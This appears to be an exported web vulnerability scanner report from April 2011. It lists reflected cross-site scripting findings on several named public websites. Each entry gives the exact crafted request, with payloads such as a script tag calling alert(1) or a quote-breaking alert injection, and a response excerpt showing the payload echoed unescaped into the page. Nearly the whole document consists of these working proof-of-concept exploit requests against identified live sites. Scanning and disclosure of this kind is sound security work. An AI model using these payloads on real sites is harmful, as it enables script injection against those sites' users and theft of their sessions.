Severity: | High |
Confidence: | Certain |
Host: | http://www.beyond.com |
Path: | /favicon.ico |
GET /favicon.icoe5463%20style%3dx User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.beyond.com Accept: */* Proxy-Connection: Keep-Alive |
HTTP/1.1 404 Cache-Control: private Content-Length: 30033 Content-Type: text/html Server: Microsoft-IIS/7.0 Set-Cookie: PORTAL=PARTNER=Beyond Set-Cookie: Visitor=NewSessionID Set-Cookie: ASPSESSIONIDAQTRQBAR X-Powered-By: ASP.NET Date: Sat, 02 Apr 2011 14:03:54 GMT <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns:fb="http://www <head> <meta http-equ ...[SNIP]... 6124&r_partnersitename ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.biblegateway |
Path: | /favicon.ico |
GET /favicon.ico9cd89"><script>alert(1)< User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.biblegateway.com Accept: */* Proxy-Connection: Keep-Alive |
HTTP/1.1 404 Not Found Server: nginx/0.8.54 Date: Sat, 02 Apr 2011 13:35:46 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive Vary: Accept-Encoding X-Powered-By: PHP/5.1.6 Set-Cookie: bg_id=00ab965157d853 Content-Length: 18832 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>BibleGateway.com - W ...[SNIP]... <input type="text" size="40" name="request" value="http://www ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.biblegateway |
Path: | /favicon.ico |
GET /favicon.icoe6b8e--><script>alert(1)< User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.biblegateway.com Accept: */* Proxy-Connection: Keep-Alive |
HTTP/1.1 404 Not Found Server: nginx/0.8.54 Date: Sat, 02 Apr 2011 13:35:47 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive Vary: Accept-Encoding X-Powered-By: PHP/5.1.6 Set-Cookie: bg_id=1183588a850821 Content-Length: 18834 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>BibleGateway.com - W ...[SNIP]... <input type="text" size="40" name="request" value="/favicon.icoe6b8e--><script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.blackplanet |
Path: | /favicon.ico |
GET /3f3c8"><script>alert(1)< User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.blackplanet.com Accept: */* Proxy-Connection: Keep-Alive |
HTTP/1.1 404 Not Found Date: Sat, 02 Apr 2011 14:00:21 GMT Server: Apache X-Powered-By: PHP/5.2.4 Edge-control: no-store Page-Name: /3f3c8"><script>alert(1)< Set-Cookie: user_guid=d41d8cd98f Cache-Control: no-cache, no-store, private Content-Type: text/html; charset=utf-8 Content-Length: 77942 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html> <head> <meta http-equiv="Content-Type" content="text/ht ...[SNIP]... <base href="http://www ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.blurtit.com |
Path: | /favicon.ico |
GET /favicon.icob6f4c'-alert(1)- User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.blurtit.com Accept: */* Proxy-Connection: Keep-Alive |
HTTP/1.1 404 Not Found Date: Sat, 02 Apr 2011 13:27:15 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Expires: Thu, 19 Nov 1981 08:52:00 GMT Last-Modified: Sat, 02 Apr 2011 13:27:15 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache P3P: policyref="/w3c/p3p.xml", CP="IDC DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Set-Cookie: PHPSESSID=gj6oi7nrch Vary: Accept-Encoding,User Content-Type: text/html; charset=UTF-8 Content-Length: 16236 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... hEngine( "http://www.blurtit.com "http://www.blurtit.com name,cat); } else{ errorMsg(name,ext,cat); } } var currentPage = '/favicon.icob6f4c'-alert(1)- //--> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.blurtit.com |
Path: | /favicon.ico |
GET /favicon.ico27e95"><script>alert(1)< User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.blurtit.com Accept: */* Proxy-Connection: Keep-Alive |
HTTP/1.1 404 Not Found Date: Sat, 02 Apr 2011 13:27:15 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Expires: Thu, 19 Nov 1981 08:52:00 GMT Last-Modified: Sat, 02 Apr 2011 13:27:15 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache P3P: policyref="/w3c/p3p.xml", CP="IDC DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Set-Cookie: PHPSESSID=3fuii4e2ro Vary: Accept-Encoding,User Content-Type: text/html; charset=UTF-8 Content-Length: 16266 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <div id="large_modal" script="/zone.php" return="/favicon.ico27e95"><script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.booking.com |
Path: | /favicon.ico |
GET /favicon.ico31d83"><script>alert(1)< User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.booking.com Accept: */* Proxy-Connection: Keep-Alive |
HTTP/1.1 404 Not Found Date: Sat, 02 Apr 2011 13:34:46 GMT Server: Apache Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 X-Cache: MISS from www.booking.com Content-Length: 38617 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR ...[SNIP]... <meta property="og:url" content="http://www ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.buzzillions |
Path: | /favicon.ico |
GET /7c2b1<script>alert(1)< User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.buzzillions.com Accept: */* Proxy-Connection: Keep-Alive |
HTTP/1.1 404 Not Found Date: Sat, 02 Apr 2011 14:03:46 GMT Server: Apache/2.2.9 (Unix) Set-Cookie: cref=""; Expires=Tue, 30-Mar-2021 14:03:46 GMT; Path=/ Set-Cookie: lapg=%2F7c2b1%3Cscript Set-Cookie: oref=""; Expires=Tue, 30-Mar-2021 14:03:46 GMT; Path=/ Set-Cookie: bzid=1301753026034; Expires=Tue, 30-Mar-2021 14:03:46 GMT; Path=/ Set-Cookie: JSESSIONID=C8D8B00D7 Content-Language: en-US Vary: Accept-Encoding Connection: close Content-Type: text/html;charset=UTF-8 Content-Length: 25260 <!DOCTYPE html> <html lang="en" xmlns="http://www.w3.org <head> <meta name="verify-v1" con ...[SNIP]... <span style="color: #74B74A);" class="bz-emphasize">"7c2b1<script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.buzzillions |
Path: | /favicon.ico |
GET /3d827'%3balert(1)/ User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.buzzillions.com Accept: */* Proxy-Connection: Keep-Alive |
HTTP/1.1 404 Not Found Date: Sat, 02 Apr 2011 14:03:45 GMT Server: Apache/2.2.9 (Unix) Set-Cookie: cref=""; Expires=Tue, 30-Mar-2021 14:03:45 GMT; Path=/ Set-Cookie: lapg=%2F3d827%27%3FN%3D0 Set-Cookie: oref=""; Expires=Tue, 30-Mar-2021 14:03:45 GMT; Path=/ Set-Cookie: bzid=1301753025507; Expires=Tue, 30-Mar-2021 14:03:45 GMT; Path=/ Set-Cookie: JSESSIONID=C0D0FFA84 Content-Language: en-US Vary: Accept-Encoding Connection: close Content-Type: text/html;charset=UTF-8 Content-Length: 28216 <!DOCTYPE html> <html lang="en" xmlns="http://www.w3.org <head> <meta name="verify-v1" con ...[SNIP]... <script>bZ.events ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.buzzillions |
Path: | /favicon.ico |
GET /8110a</title><script User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.buzzillions.com Accept: */* Proxy-Connection: Keep-Alive |
HTTP/1.1 404 Not Found Date: Sat, 02 Apr 2011 14:03:46 GMT Server: Apache/2.2.9 (Unix) Set-Cookie: cref=""; Expires=Tue, 30-Mar-2021 14:03:46 GMT; Path=/ Set-Cookie: lapg=%2F8110a%3C%2Ftitle Set-Cookie: oref=""; Expires=Tue, 30-Mar-2021 14:03:46 GMT; Path=/ Set-Cookie: bzid=1301753026723; Expires=Tue, 30-Mar-2021 14:03:46 GMT; Path=/ Set-Cookie: JSESSIONID=985D75A48 Content-Language: en-US Vary: Accept-Encoding Connection: close Content-Type: text/html;charset=UTF-8 Content-Length: 28575 <!DOCTYPE html> <html lang="en" xmlns="http://www.w3.org <head> <meta name="verify-v1" con ...[SNIP]... <title>Buzzillions.com - Search for “8110a</title><script ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.caringbridge |
Path: | /favicon.ico |
GET /favicon.ico4e0af"><script>alert(1)< User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.caringbridge.org Accept: */* Proxy-Connection: Keep-Alive |
HTTP/1.1 404 Not Found Date: Sat, 02 Apr 2011 13:45:06 GMT Server: Apache Set-Cookie: lang=en; path=/ Cache-Control: max-age=0 Expires: Sat, 02 Apr 2011 13:45:06 GMT Content-Type: text/html;charset=utf-8 Content-Length: 9848 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>The Page You Requested Was N ...[SNIP]... <a href="/favicon.ico4e0af"><script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.cliffsnotes |
Path: | /favicon.ico |
GET /favicon.ico13a1d<script>alert(1)< User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.cliffsnotes.com Accept: */* Proxy-Connection: Keep-Alive |
HTTP/1.0 404 Not Found Date: Sat, 02 Apr 2011 14:09:27 GMT Server: Apache Vary: Accept-Encoding Content-Type: text/html;charset=UTF-8 Set-Cookie: JSESSIONID=1D6D0BAF1 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html lang="en" xml:lang="en" xmlns="http://www.w3.org ...[SNIP]... <i>/WileyCDA//favicon.ico13a1d<script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.colbertnation |
Path: | /favicon.ico |
GET /favicon.icoc8cf7"><script>alert(1)< User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.colbertnation.com Accept: */* Proxy-Connection: Keep-Alive |
HTTP/1.1 404 Not Found Server: Apache/2.0.63 (Unix) PHP/5.3.1 X-Powered-By: PHP/5.3.1 Accept-ESI: 1.0 Content-Type: text/html Content-Length: 24243 Cache-Control: max-age=3593 Date: Sat, 02 Apr 2011 14:19:11 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <he ...[SNIP]... <link rel="canonical" href="http://www ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.collegehumor |
Path: | /favicon.ico |
GET /favicon.ico1f7f8"-alert(1)- User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.collegehumor.com Accept: */* Proxy-Connection: Keep-Alive |
HTTP/1.0 404 Not Found Date: Sat, 02 Apr 2011 13:38:05 GMT Server: Apache X-Powered-By: PHP/5.3.6 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Set-Cookie: returning_user=deleted; expires=Fri, 02-Apr-2010 13:38:04 GMT; path=/; domain=.collegehumor.com Set-Cookie: returning_user=1; expires=Mon, 02-May-2011 13:38:05 GMT; path=/; domain=.collegehumor.com Set-Cookie: jument_hash=deleted; expires=Fri, 02-Apr-2010 13:38:04 GMT; path=/; domain=.collegehumor.com Set-Cookie: jument_hash=bfd7f487 Set-Cookie: jument_hash=bfd7f487 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... "5480.iac.collegehumor"; jument.cookie.domain = ".collegehumor.com"; jument.home_url = "http://www.collegehumor jument.this_url = "http://www.collegehumor jument.user_id = 0; // CH8 STUFF var ch = window.ch || {}; ch.logged_in = false; ch.this_url = 'http://www.collegehumor ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.collegehumor |
Path: | /favicon.ico |
GET /favicon.ico884c7'-alert(1)- User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.collegehumor.com Accept: */* Proxy-Connection: Keep-Alive |
HTTP/1.0 404 Not Found Date: Sat, 02 Apr 2011 13:38:07 GMT Server: Apache X-Powered-By: PHP/5.3.6 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Set-Cookie: returning_user=deleted; expires=Fri, 02-Apr-2010 13:38:06 GMT; path=/; domain=.collegehumor.com Set-Cookie: returning_user=1; expires=Mon, 02-May-2011 13:38:07 GMT; path=/; domain=.collegehumor.com Set-Cookie: jument_hash=deleted; expires=Fri, 02-Apr-2010 13:38:06 GMT; path=/; domain=.collegehumor.com Set-Cookie: jument_hash=bd254816 Set-Cookie: jument_hash=bd254816 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... )-'3ff612d36a6"; jument.user_id = 0; // CH8 STUFF var ch = window.ch || {}; ch.logged_in = false; ch.this_url = 'http://www.collegehumor ch.this_url_64 = 'aHR0cDovL3d3dy5jb2x ch.home_url = 'http://www.collegehumor ch.user_id = 0; ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.collegehumor |
Path: | /favicon.ico |
GET /favicon.ico?f0e55"-alert(1)- User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.collegehumor.com Accept: */* Proxy-Connection: Keep-Alive |
HTTP/1.0 404 Not Found Date: Sat, 02 Apr 2011 13:37:15 GMT Server: Apache X-Powered-By: PHP/5.3.6 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Set-Cookie: returning_user=deleted; expires=Fri, 02-Apr-2010 13:37:14 GMT; path=/; domain=.collegehumor.com Set-Cookie: returning_user=1; expires=Mon, 02-May-2011 13:37:15 GMT; path=/; domain=.collegehumor.com Set-Cookie: jument_hash=deleted; expires=Fri, 02-Apr-2010 13:37:14 GMT; path=/; domain=.collegehumor.com Set-Cookie: jument_hash=43262f6a Set-Cookie: jument_hash=43262f6a Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... "5480.iac.collegehumor"; jument.cookie.domain = ".collegehumor.com"; jument.home_url = "http://www.collegehumor jument.this_url = "http://www.collegehumor jument.user_id = 0; // CH8 STUFF var ch = window.ch || {}; ch.logged_in = false; ch.this_url = 'http://www.collegehumor ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.collegehumor |
Path: | /favicon.ico |
GET /favicon.ico?e1307'-alert(1)- User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.collegehumor.com Accept: */* Proxy-Connection: Keep-Alive |
HTTP/1.0 404 Not Found Date: Sat, 02 Apr 2011 13:37:18 GMT Server: Apache X-Powered-By: PHP/5.3.6 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Set-Cookie: returning_user=deleted; expires=Fri, 02-Apr-2010 13:37:17 GMT; path=/; domain=.collegehumor.com Set-Cookie: returning_user=1; expires=Mon, 02-May-2011 13:37:18 GMT; path=/; domain=.collegehumor.com Set-Cookie: jument_hash=deleted; expires=Fri, 02-Apr-2010 13:37:17 GMT; path=/; domain=.collegehumor.com Set-Cookie: jument_hash=b73f2f66 Set-Cookie: jument_hash=b73f2f66 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... '314d4297df=1"; jument.user_id = 0; // CH8 STUFF var ch = window.ch || {}; ch.logged_in = false; ch.this_url = 'http://www.collegehumor ch.this_url_64 = 'aHR0cDovL3d3dy5jb2x ch.home_url = 'http://www.collegehumor ch.user_id = 0 ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://www.craveonline |
Path: | /favicon.ico |
GET /favicon.ico3b192--><a>42b747ad359 HTTP/1.1 User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.craveonline.com Accept: */* Proxy-Connection: Keep-Alive |
HTTP/1.1 404 Not Found Server: Apache/2 Status: 404 Not Found Expires: Sat, 02 Apr 2011 14:25:35 GMT Cache-Control: public, max-age=300 Vary: Accept-Encoding X-Served-By: app1v-fe.sb.lax1 Content-Type: text/html; charset=UTF-8 Content-Length: 56159 Date: Sat, 02 Apr 2011 14:20:35 GMT X-Varnish: 878005268 Age: 0 Via: 1.1 varnish Connection: keep-alive X-Cache: MISS from pxy1v.sb.lax1 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR <html lang="en"> <head> <!-- page created on - 12-03-10, 08:52:39 --> <!-- $Id: pagegen.php 2816 2009-06-25 1 ...[SNIP]... <!-- BEGIN GN Ad Tag for Craveonline 1000x1000 favicon.ico3b192--><a>42b747ad359 --> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.craveonline |
Path: | /favicon.ico |
GET /favicon.ico88a67'-alert(1)- User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.craveonline.com Accept: */* Proxy-Connection: Keep-Alive |
HTTP/1.1 404 Not Found Server: Apache/2 Status: 404 Not Found Expires: Sat, 02 Apr 2011 14:25:32 GMT Cache-Control: public, max-age=300 Vary: Accept-Encoding X-Served-By: app2v-fe.sb.lax1 Content-Type: text/html; charset=UTF-8 Content-Length: 56303 Date: Sat, 02 Apr 2011 14:20:32 GMT X-Varnish: 878005112 Age: 0 Via: 1.1 varnish Connection: keep-alive X-Cache: MISS from pxy1v.sb.lax1 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR <html lang="en"> <head> <!-- page created on - 12-03-10, 08:52:39 --> <!-- $Id: pagegen.php 2816 2009-06-25 1 ...[SNIP]... <scr'+'ipt language="JavaScript" src="http://n4403ad ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.csmonitor.com |
Path: | /favicon.ico |
GET /d6502"-alert(1)- User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.csmonitor.com Accept: */* Proxy-Connection: Keep-Alive |
HTTP/1.1 404 Not Found Server: Apache/2.2.12 (Ubuntu) X-Powered-By: eZ Publish Pragma: no-cache Last-Modified: Sat, 02 Apr 2011 13:27:22 GMT Served-by: Content-Language: en-US Status: 404 Not Found Content-Type: text/html; charset=utf-8 Cache-Control: public, must-revalidate, max-age=86384 Expires: Sun, 03 Apr 2011 13:27:07 GMT Date: Sat, 02 Apr 2011 13:27:23 GMT Content-Length: 21591 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <!--seo title--> <tit ...[SNIP]... <script language="JavaScript" type="text/javascript"> s.pageName="/d6502"-alert(1)- var s_code=s.t();if(s_code </script> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.docstoc.com |
Path: | /favicon.ico |
GET /favicon.ico9d5f5'-alert(1)- User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.docstoc.com Accept: */* Proxy-Connection: Keep-Alive |
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Set-Cookie: user_guid=1a45ceec-1c83 Set-Cookie: first_time=1; domain=docstoc.com; path=/ Set-Cookie: session.docstoc Set-Cookie: session.docstoc.seo={ Set-Cookie: session.docstoc.source={ Set-Cookie: geoinfo.docstoc={ Set-Cookie: session.docstoc=d10a866a Set-Cookie: memguid.docstoc=811a77f3 Set-Cookie: fingerprint.docstoc={ Set-Cookie: pages_visited=1; path=/ Set-Cookie: general=showTopIE9=1,1,4 Set-Cookie: cartItemCount=0; expires=Mon, 02-May-2011 13:31:59 GMT; path=/ serverID: www2 Date: Sat, 02 Apr 2011 13:31:58 GMT Content-Length: 15433 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... insertBefore(ga, s); })(); var redirectUrl='/login _qoptions={qacct:"p </script> ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://www.domaintools |
Path: | /favicon.ico |
GET /c8b31<a>cfeca55b272 HTTP/1.1 User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.domaintools.com Accept: */* Proxy-Connection: Keep-Alive |
HTTP/1.1 404 Not Found Server: Apache X-Powered-By: PHP/5.2.6 Expires: Sat, 02 Apr 2011 14:45:19 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html; charset=utf-8 Date: Sat, 02 Apr 2011 13:45:19 GMT Content-Length: 11939 Connection: close Set-Cookie: dtsession=0c96c752b9 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR <head> <title>DomainTools: Page Not Found</title> <link rel="alternate" type="application/ ...[SNIP]... <a>cfeca55b272">Whois record for "c8b31<a>cfeca55b272"</a> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.driverside.com |
Path: | /favicon.ico |
GET /favicon.ico27027"-alert(1)- User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.driverside.com Accept: */* Proxy-Connection: Keep-Alive |
HTTP/1.1 404 Not Found Date: Sat, 02 Apr 2011 13:39:11 GMT Server: Apache/2.2.14 (EL) X-Powered-By: PHP/5.2.11 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: SelectedCarID=deleted; expires=Fri, 02-Apr-2010 13:39:11 GMT; path=/ Set-Cookie: SelectedTrimID=deleted; expires=Fri, 02-Apr-2010 13:39:11 GMT; path=/ Set-Cookie: SelectedStyleID=deleted; expires=Fri, 02-Apr-2010 13:39:11 GMT; path=/ Set-Cookie: TplType=2; expires=Mon, 09-May-2011 01:39:12 GMT; path=/ Set-Cookie: Ds_client=ed826f9ef3 Set-Cookie: UUID=DS-7fa5332a-91f8 Set-Cookie: business_id=deleted; expires=Fri, 02-Apr-2010 13:39:11 GMT; path=/ Set-Cookie: partner_id=deleted; expires=Fri, 02-Apr-2010 13:39:11 GMT; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 15280 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Conten ...[SNIP]... <!-- /* Copyright 1997-2004 Omniture, Inc. */ s.prop1="DS"; s.prop2="Sat"; s.prop3="06"; s.prop7="/favicon.ico27027"-alert(1)- s.prop15="unregistered"; s.prop16="logged out"; s.prop17="non-member"; s.eVar1="DS"; s.eVar12="Sat"; s.eVar13="06"; s.eVar15="unregistered"; s.eVar16="logged out"; s.eVar17="non-member"; s.zip="" /* ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://www.education.com |
Path: | /favicon.ico |
GET /favicon.icod2a97"%3b06af93cafcd HTTP/1.1 User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.education.com Accept: */* Proxy-Connection: Keep-Alive |
HTTP/1.1 404 Not Found Server: nginx Date: Sat, 02 Apr 2011 13:35:10 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.3.5 Set-Cookie: e=fhkbhen0kd9vs4jlqh Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: i=0; expires=Tue, 14-Jun-2011 13:35:10 GMT; path=/ Content-Length: 140381 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="co ...[SNIP]... <!--if(!s.pageName) s.pageName="Education.com | An Education & Child Development Site for Parents | Parenting & Educational Resource"; s.pageType="errorPage"; if(!s.channel) s.channel="favicon.icod2a97";06af93cafcd"; s.prop5=Cookie.get( s.prop6=0; s.prop7='organic'; s.eVar15='organic'; s.prop13='Home Page'; s.prop17='none'; s.campaign=''; s.prop18='web00'; if(Cookie.read&&Cookie ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://www.egotastic.com |
Path: | /favicon.ico |
GET /favicon.ico15911"><a>dcba971d871 HTTP/1.1 User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.egotastic.com Accept: */* Proxy-Connection: Keep-Alive |
HTTP/1.1 404 Not Found Date: Sat, 02 Apr 2011 13:44:00 GMT Server: Apache X-Powered-By: PHP/5.1.6 Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 126517 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Cont ...[SNIP]... <input type="hidden" name="GBORGVHR2WGPMZ ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.egotastic.com |
Path: | /favicon.ico |
GET /favicon.ico4bbdc<script>alert(1)< User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.egotastic.com Accept: */* Proxy-Connection: Keep-Alive |
HTTP/1.1 404 Not Found Date: Sat, 02 Apr 2011 13:44:02 GMT Server: Apache X-Powered-By: PHP/5.1.6 Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 126726 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Cont ...[SNIP]... <p>The page you are looking for: "http://www.egotastic.com ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.elyrics.net |
Path: | /favicon.ico |
GET /favicon.ico7526b<script>alert(1)< User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.elyrics.net Accept: */* Proxy-Connection: Keep-Alive |
